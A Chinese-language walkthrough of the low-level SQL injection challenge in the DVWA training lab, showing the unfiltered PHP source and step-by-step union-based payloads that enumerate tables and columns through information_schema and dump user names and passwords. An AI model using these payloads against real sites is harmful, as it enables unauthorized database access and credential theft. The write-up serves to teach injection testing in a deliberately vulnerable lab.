sql注入基本思路:
1.源码
2.判断数字型和字符型
3.猜测字段数
4.查询数据库中的字段
5.查询表中的字段
6.查询user表中的字段
7.拿字段中数据

low:

1.源码:

<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) {// Get input$id = $_REQUEST[ 'id' ];// Check database$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Get resultswhile( $row = mysqli_fetch_assoc( $result ) ) {// Get values$first = $row["first_name"];$last  = $row["last_name"];// Feedback for end userecho "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";}mysqli_close($GLOBALS["___mysqli_ston"]);
}?>

可以看到没有任何过滤语句
2.判断数字型和字符型:
加单引号: 1' 回显失败

加判断 1 and 1=1 回显正常

判断:1 and 1=2,回显正常且查询成功,可判断不是数字型注入

判断:1‘ and '1'='1,回显查询正常

判断:1’ and ‘1’='2,回显失败

说明类型为字符型注入
3.猜测字段数:
格式: order by 数字 #
数字是将这n个数字按顺序列出,#井号作用是屏蔽之后的语句

回显错误:1' order by 3 #

4.查询数据库中的字段:
union select联合查询

查询出两个字段: First name 和 Surname
5.查询表中的字段
语句:1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
group_concat : 返回结果为连接参数产生的字符串,并将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

也 可以用concat函数,只是结果会分开,不如group_concat直观

结果:查询出guestbook 和 users两个表名

6.查询user表中的字段
语句:1' union select 1,group_concat(column_name)from information_schema.columns where table_name='users' #
发现敏感字段:user-id,password

7.拿字段中数据:
语句:1' union select group_concat(user),group_concat(password) from users #

除此之外,user_id中是数字序号,firstname中是用户名,last_name中是姓。。。。等等,都可以通过语句得到

dvwa 的sql模块似乎出了点问题,低中高三级都打不开了。。。。

DVWA sql注入 WP相关推荐

  1. 史上最详细sql注入wp

    文章目录 sql注入wp(史上最详细) 前言 什么是SQL注入? SQL注入的原理 常见的注入方式 常见绕过技巧 常见防控SQL注入的方法 手工查询语句 Basic Challenges Less-1 ...

  2. DVWA SQL注入

    DVWA SQL注入 安装及下载 dvwa. 插件等 请看上一篇文章 1.首先修改 low 2.SQL注入打开proxy switcher,如此修改 3. 打开Burp页面,关闭intercept 4 ...

  3. DVWA—sql注入( SQL Injection)

    DVWA-sql注入( SQL Injection) 原理 将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的. 类型 数字 字符 搜索 过程 1.判断是否存在注入,注入时字符型还是数 ...

  4. DVWA sql注入(high)

    有了前两关的基础,现在做起来,比较得心应手了 现在开始: 1.输入1' 输入1' and '1'='1 输入1' and '1'='2 由此可见,这也是一个字符型的注入 2.获取字段数 输入1' or ...

  5. 【ctfshow】web篇-SQL注入 wp

    前言 记录web的题目wp,慢慢变强,铸剑. SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "s ...

  6. DVWA SQL注入攻击

    SQL注入原理 SQL注入就是通过SQL命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据 ...

  7. 通过sql注入窃取用户数据库信息

    一.SQL注入的定义 SQL Injection ,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害是巨大的,常常会导 ...

  8. php wp foo,【翻译】WordPress WPDB SQL注入攻击(技术文档)

    WordPress 4.8.3中修复了一个重要的SQL注入漏洞.漏洞是今年9月20日由Hacker-One报告的.本文主要讲了漏洞的技术细节和解决方法. 升级到最新版本 网站管理员应该升级WordPr ...

  9. 使用Sqlmap对dvwa进行sql注入测试(初级阶段)

    0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和 ...

最新文章

  1. SSRS 2012 聚合函数 -- 隔行换色示例
  2. (Mirage系列之五)Mirage经典案例之桌面驱动和基础层管理
  3. 03.shard_allocation_和_cluster的routing设置
  4. some screenshot of Fiori cloud launchpad
  5. makefile:2: *** 遗漏分隔符 。 停止
  6. D类IP地址和组播传输
  7. 查询中where和having的区别
  8. C0型单元刚度矩阵的性质
  9. 考研高等数学张宇30讲笔记——第十二讲 二重积分
  10. 有道词典【输入式翻页】
  11. vs2019个性化配置
  12. 机器学习中的忒修斯之船:那些“愚弄”专家的著名悖论
  13. 计算机开机速度慢是什么原因,电脑开机慢是什么原因?怎么处理?
  14. iOS13 sign in with Apple客户端接入遇到的一些问题
  15. app互斥登录,只能登录一个.
  16. [RFID]射频卡介绍(一)ID-EM4100
  17. myeclipse中怎么显示代码行号
  18. WRF与WPS的编译与安装
  19. 不用再羡慕同事有好看的财务报表啦,这里的报表模板随你用!
  20. 跟我一起玩《linux内核设计的艺术》第1章(四)——from setup.s to head.s,这回一定让main滚出来!(已解封)

热门文章

  1. springboot 通过url访问本地文件
  2. IDEA JDK1.8 ProGuard 混淆Maven项目代码
  3. SpringBoot 整合 Redis 哨兵机制_01
  4. jsp文字上下居中显示_微信朋友圈又有骚技巧,一键设置居中签名,好友傻眼了...
  5. continue详细讲解
  6. BugkuCTF-Crypto题easy_crypto
  7. 学计算机买电脑显卡1605ti够吗,铭瑄GTX1660Ti显卡值得买吗 铭瑄GTX1660Ti终结者显卡评测...
  8. php 断点续传 暂停,PHP 断点续传实例详解
  9. tp5 mysql实现消息队列_TP5系列 | Queue消息队列
  10. 2019matlab中的floyd,基于matlab的floyd算法详解